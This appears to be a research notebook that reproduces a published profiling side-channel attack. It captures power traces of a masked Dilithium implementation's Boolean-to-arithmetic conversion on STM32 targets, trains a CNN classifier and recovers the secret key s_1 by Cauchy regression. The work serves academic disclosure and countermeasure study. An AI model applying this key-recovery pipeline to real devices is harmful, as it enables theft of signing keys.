## Profiling Side-Channel Attack on a Masked Dilithium Implementation
                                              
This notebook contains the proof of concept attack on the masked Dilithium implementation of [1], desribed in [2].
The Boolean to arithmetic conversion of masked shares is targeted to gain information about the commitment- or error-vector coefficient y.
Using Cauchy regression this information is used to recover the partial secret key s_1.

[1] https://github.com/fragerar/Masked_Dilithium  
[2] https://eprint.iacr.org/2023/896

## 0) Setup
- Choose security_level to attack. Notebook should be re-run from top on change of security_level.
- Import helper functions and dependencies from attack_includes.py.
- (Option A) Compile target firmware for CW308 with STM32F415RGT target and SimpleSerial V1.1 to capture traces.
Optimization level 3 (-O3) is used as it is commonly most resilient against SCA in lattice-based schemes [SKL+20].
- (Option B) Download profiling- and attack-traces as well as classifiers used for the attack described in the ASIACCrypt paper.

In [None]:
# Choose security level to attack from {2, 3, 5}
security_level = 2
y_intermediate = {2: 2**17, 3: 2**19, 5:2**19}[security_level]
data_path = "attack/paper_data/"

In [None]:
# Import includes and helpers
%run "attack/helper.py"
%matplotlib inline

##### (Option A) Install Chipwhisperer dependencies and build target firmware

In [None]:
pip install chipwhisperer==6.0.0

In [None]:
# Import capture helpers
%run "attack/capture.py"

In [None]:
%%bash
mkdir attack/extern
cd attack/extern
git clone --depth 1 --branch v6.0.0 https://github.com/newaetech/chipwhisperer.git
cd chipwhisperer
git submodule update --init firmware/mcu/hal/chipwhisperer-fw-extra

In [None]:
%%bash
cd attack/firmware
make OPT=3 PLATFORM='CW308_STM32F4' CRYPTO_TARGET='NONE' SS_VER='SS_VER_1_1' > /dev/null

##### (Option B) Download paper attack data for reproduction of results (1GB downlad, 7GB disk space)

In [None]:
%%bash
mkdir attack/paper_data
cd attack/paper_data
wget --progress=bar:force:noscroll https://zenodo.org/records/17291471/files/attack_data.zip
unzip -q attack_data.zip

## 1) Profiling Stage

In the profiling stage power traces are collected on a profiling device A during the Boolean to arithmetic (b2a) conversion of randomly generated boolean share pairs, masking either y<0 coefficients (labeled 0) or y>=0 coefficients (labeled 1). A CNN-based binary classifier is trained to predict whether a trace corresponds to the conversion of shares masking a y<0 or y>=0 coefficient.

### 1.1) (Option A) Load pre-captured profiling traces

In [None]:
# Load pre-captured profiling traces, captured on profiling device A
# The same traces are used for level 3 and 5 due to similar 
# y_intermediate = 2**19 -> y=0.
profiling_idx = {2: 2, 3: 35, 5: 35}[security_level]
profiling_traces = np.load(data_path + f"/profiling/profiling_traces_{profiling_idx}_A.npy")
profiling_labels = np.load(data_path + f"/profiling/profiling_labels_{profiling_idx}_A.npy")

### 1.1) (Option B) Collect profiling traces

To collect profiling traces using a Chipwhisperer make sure the python dependency is installed (uncommented in requirements_attack.txt) and a recent chipwhisperer framework is cloned into the attack folder (attack/extern/chipwhisperer)

##### Compile target firmware and program target

In [None]:
# Note that in the attack performed as part of the ASIACrypt Paper, 
# two distinct Chipwhisperer Lite (CW308) devices with two distinct
# STM32F415RGT target/victim devices were used for the performed
# profiling and attack respectively.
profiling_scope = cw.scope()
profiling_scope.default_setup()
# Flush the hex file to the target device
cw.program_target(profiling_scope, cw.programmers.STM32FProgrammer, "attack/firmware/b2a-CW308_STM32F4.hex", baud = 115200)
profiling_target = cw.target(profiling_scope, cw.targets.SimpleSerial, flush_on_err=False)
# On correct programming receive 'OK!' message.
profiling_target.read()

##### Capture profiling traces

In [None]:
# Collect training data of executions of b2a conversion in intervall y=0 + [-y_range, +y_range[, 
# with n_y_coeff traces per y-value with y = 2**17 for level 2 and 2**19 for levels 3 and 5.
# Representative subset for y_coeff is used for profiling with 64.000 traces in total.
y_range = {2: 16, 3: 32, 5: 32}[security_level]
y_n = {2: 2000, 3: 1000, 5: 1000}[security_level]
profiling_traces, profiling_labels = capture_profiling_traces(profiling_scope, y_intermediate, y_range, n_y_coeff=y_n)

In [None]:
# Plot TTest, SNR and power traces for the collected traces and groups y<0 and y>=0
power_traces_0, power_traces_1, snr, t_univariate = analyse_traces(profiling_traces, profiling_labels)

### 1.2) Train CNN to classify between y<0 and y>=0

#### 1.2.1) (Option A) Load pre-trained model and scaler

In [None]:
model = tf.keras.models.load_model(f"{data_path}/profiling/classifier/attack_model_{security_level}.keras")
with open(f"{data_path}/profiling/classifier/attack_scaler_{security_level}.pickle", 'rb') as f:
    scaler = pickle.load(f)

#### 1.2.2) (Option B) Prepare data and train model

In [None]:
# Seed for reproduceability
SEED = 42
tf.keras.backend.clear_session()
random.seed(SEED)
tf.random.set_seed(SEED)
tf.config.experimental.enable_op_determinism()

# Split profiling traces into training data 70% and
# test data 30%.
trace_train, trace_validation, label_train, label_validation = train_test_split(
profiling_traces, profiling_labels, test_size=0.3, stratify=profiling_labels, random_state=SEED)

scaler = StandardScaler()
trace_train = scaler.fit_transform(trace_train)
trace_validation = scaler.transform(trace_validation)

# Since we suspect dependencies between instructions 
# (4 sample points/instruction cycle) we choose a CNN
# with kernel size 8.
model = Sequential([
    Conv1D(64, kernel_size=8, activation='relu', input_shape=(trace_train.shape[1], 1)),
    MaxPooling1D(pool_size=2),
    Flatten(),
    Dense(1, activation='sigmoid')
])

# Best performing epochs and weights empirically found
# for high validation TPR and low FPR. Depending on balance
# more or less samples/signatures are required.
# Higher precision will decrease TPR on attack data and
# require more signatures for successfull key recovery.
epochs = {2: 3, 3: 8, 5: 4}[security_level]
# For level 3 and 5 higher z-filter range choices (2: +-50 (max = eta*tau = 78)
#, 3: +-100 (max = eta*tau = 196), 5: +-80 (max = eta*tau = 120)),
# distinguishing between less distant Hamming weights seems to be harder,
# higher positive weigths empirically led to lower FPR and higher TPR.
weights = {2: {0: 1, 1: 1}, 3: {0: 1, 1: 40}, 5: {0: 1, 1: 40}}[security_level]
# Compile and train model!
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=[Precision(), Recall()])
model.fit(trace_train, label_train, epochs=epochs, batch_size=128, validation_data=(trace_validation, label_validation), class_weight=weights, shuffle=False)

In [None]:
# Predict and analyse classifier on training validation data for 80% prediction threshold!
_ = predict(model, trace_validation, label_validation, threshold=0.8)

## 2) Attack Stage

In the attack stage first, the resource intensive generation of signature data is performed on a server. Next, tarces for the b2a conversion of intermediate boolean share collected during the signature generation are captured. The profiling stage classifier is used to predict whether the traces show the conversion of boolean shares masking a y_i,j coefficient smaller or greater-equal zero. This information is used to recver the partial Dilithium secret key s_1 using Cauchy regression.

### 2.1) (Option A) Load pre-captured attack traces

In [None]:
# Load pre-captured attack traces, captured on victim device B
# during b2a conversion of generated boolean_share pairs from 
# attack/attack_data_{security_level}/bs.npy
attack_traces = np.load(data_path + f"/attack/attack_traces_{security_level}_B.npy")
attack_labels = np.load(data_path + f"/attack/attack_labels_{security_level}_B.npy")

### 2.1) (Option B) Generate signature data and capture corresponding attack traces

Within a hardcoded, empirically found z-filter range, e.g. signatures polynomials with public coefficients |z_i,j| < {2: 50, 3: 100, 5: 80} ILWE samples (z = y + cs_1, s_1 and y unknow) are collected. The range is defined in data_generator/include/attack/data_generator.hpp as FILTER_Z.

The data generator collects and outputs the for masked Dilithium with security level set through the environment variable DILITHIUM_MODE the following files:
- bs.npy -- The boolean shares generated to mask the sample's y_i,j coefficient (per sample) -- Shape: (n_samples, n_shares=2)
- c.npy -- The public challenge polynomial (per sample, might be similar for multiple samples) -- Shape: (n_samples, N=256})
- coeff.npy -- The coefficient index i of the sample -- Shape: (n_samples)
- poly.npy -- The polynomial index j of the sample -- Shape: (n_samples)
- s1.npy -- The partial Dilithium secret key we want to recover (once) -- Shape: (L={2: 4, 3: 5, 5: 7}, N=256)
- y.npy -- The actual y_i,j coefficient values used for evaluation (per sample) -- Shape: (n_samples)
- z.npy -- The public polynomial z_i,j coefficient (per sample) -- Shape: (n_samples)

##### Install dependencies for data generator

In [None]:
%%bash
cd attack/data_generator
mkdir extern
cd extern
git clone --depth 1 --branch v1.0.1 https://github.com/llohse/libnpy.git
git clone https://github.com/fragerar/Masked_Dilithium.git

##### Build and run data_generator for Dilithium (security_level)

In [None]:
%%bash -s "$security_level"
cd attack/data_generator
export DILITHIUM_MODE=$1 && ./build.sh

In [None]:
# Generate signature atttack data (for 2500 zero coefficients this
# takes about 46 mins on 8 threads).
# The number of zero coefficient target was estimated from UMTS24.
# Successfull attacks were performed for <y_zero_target> coefficients:
y_zero_target = {2: 2330, 3: 3200, 5: 4400}[security_level]
# This leads to the collection of approximately the following number of ILWE samples:
# 2: 227305
# 3: 620170
# 5: 711100
# Path for newly generated data
data_path = "./"
folder_path = f"attack/attack_data_{security_level}"

In [None]:
%%bash -s "{y_zero_target}" "{folder_path}"
# Usage: data_generator <bool Masked> <unsigned ZeroCoefficientsTarget> 
#  <string OutPath> (optional: <unsigned NThreads>)
./attack/data_generator/build/src/data_generator 1 $1 $2 4

#### Capture attack power traces of b2a conversion of generated boolean share pairs

In [None]:
# Note that in the attack performed as part of the ASIACrypt Paper, 
# two distinct Chipwhisperer Lite (CW308) devices with two distinct
# STM32F415RGT target/victim devices were used for the performed
# profiling and attack respectively.
attack_scope = cw.scope()
attack_scope.default_setup()
# Flush the hex file to the target device
cw.program_target(attack_scope, cw.programmers.STM32FProgrammer, "attack/firmware/b2a-CW308_STM32F4.hex", baud = 115200)
attack_target = cw.target(attack_scope, cw.targets.SimpleSerial, flush_on_err=False)
# On correct programming receive 'OK!' message.
attack_target.read()

In [None]:
# Load .npy file of real-world generated boolean shares
boolean_shares = np.load(f"{data_path}/attack/attack_data_{security_level}/bs.npy")
# Capture traces of the b2a conversion of the generated boolean shares pairs
attack_traces, attack_labels = capture_attack_traces(attack_scope, boolean_shares, y_intermediate)

### 2.2) Predict y-coefficients using the classifier and recover secret key s_1

In [None]:
# Apply scaling similar to profiling!
scaled_attack_traces = scaler.transform(attack_traces)
# Predict traces show conversion of intermediates corresponding to y<0 or y>= 0
# coefficients with at least 80% predicted probability.
prediction = predict(model, scaled_attack_traces, attack_labels, threshold=0.8)

In [None]:
# Paths to pass to command line call...
attack_data_path = f"{data_path}/attack/attack_data_{security_level}/"
prediction_path = f"{attack_data_path}/prediction.npy"
# Save prediction
np.save(prediction_path, prediction)
# Compute secret key using Cauchy regression.
# Usage: python recover_key.py <generated signature data> <prediction.npy>
%run attack/recover_key.py $attack_data_path $prediction_path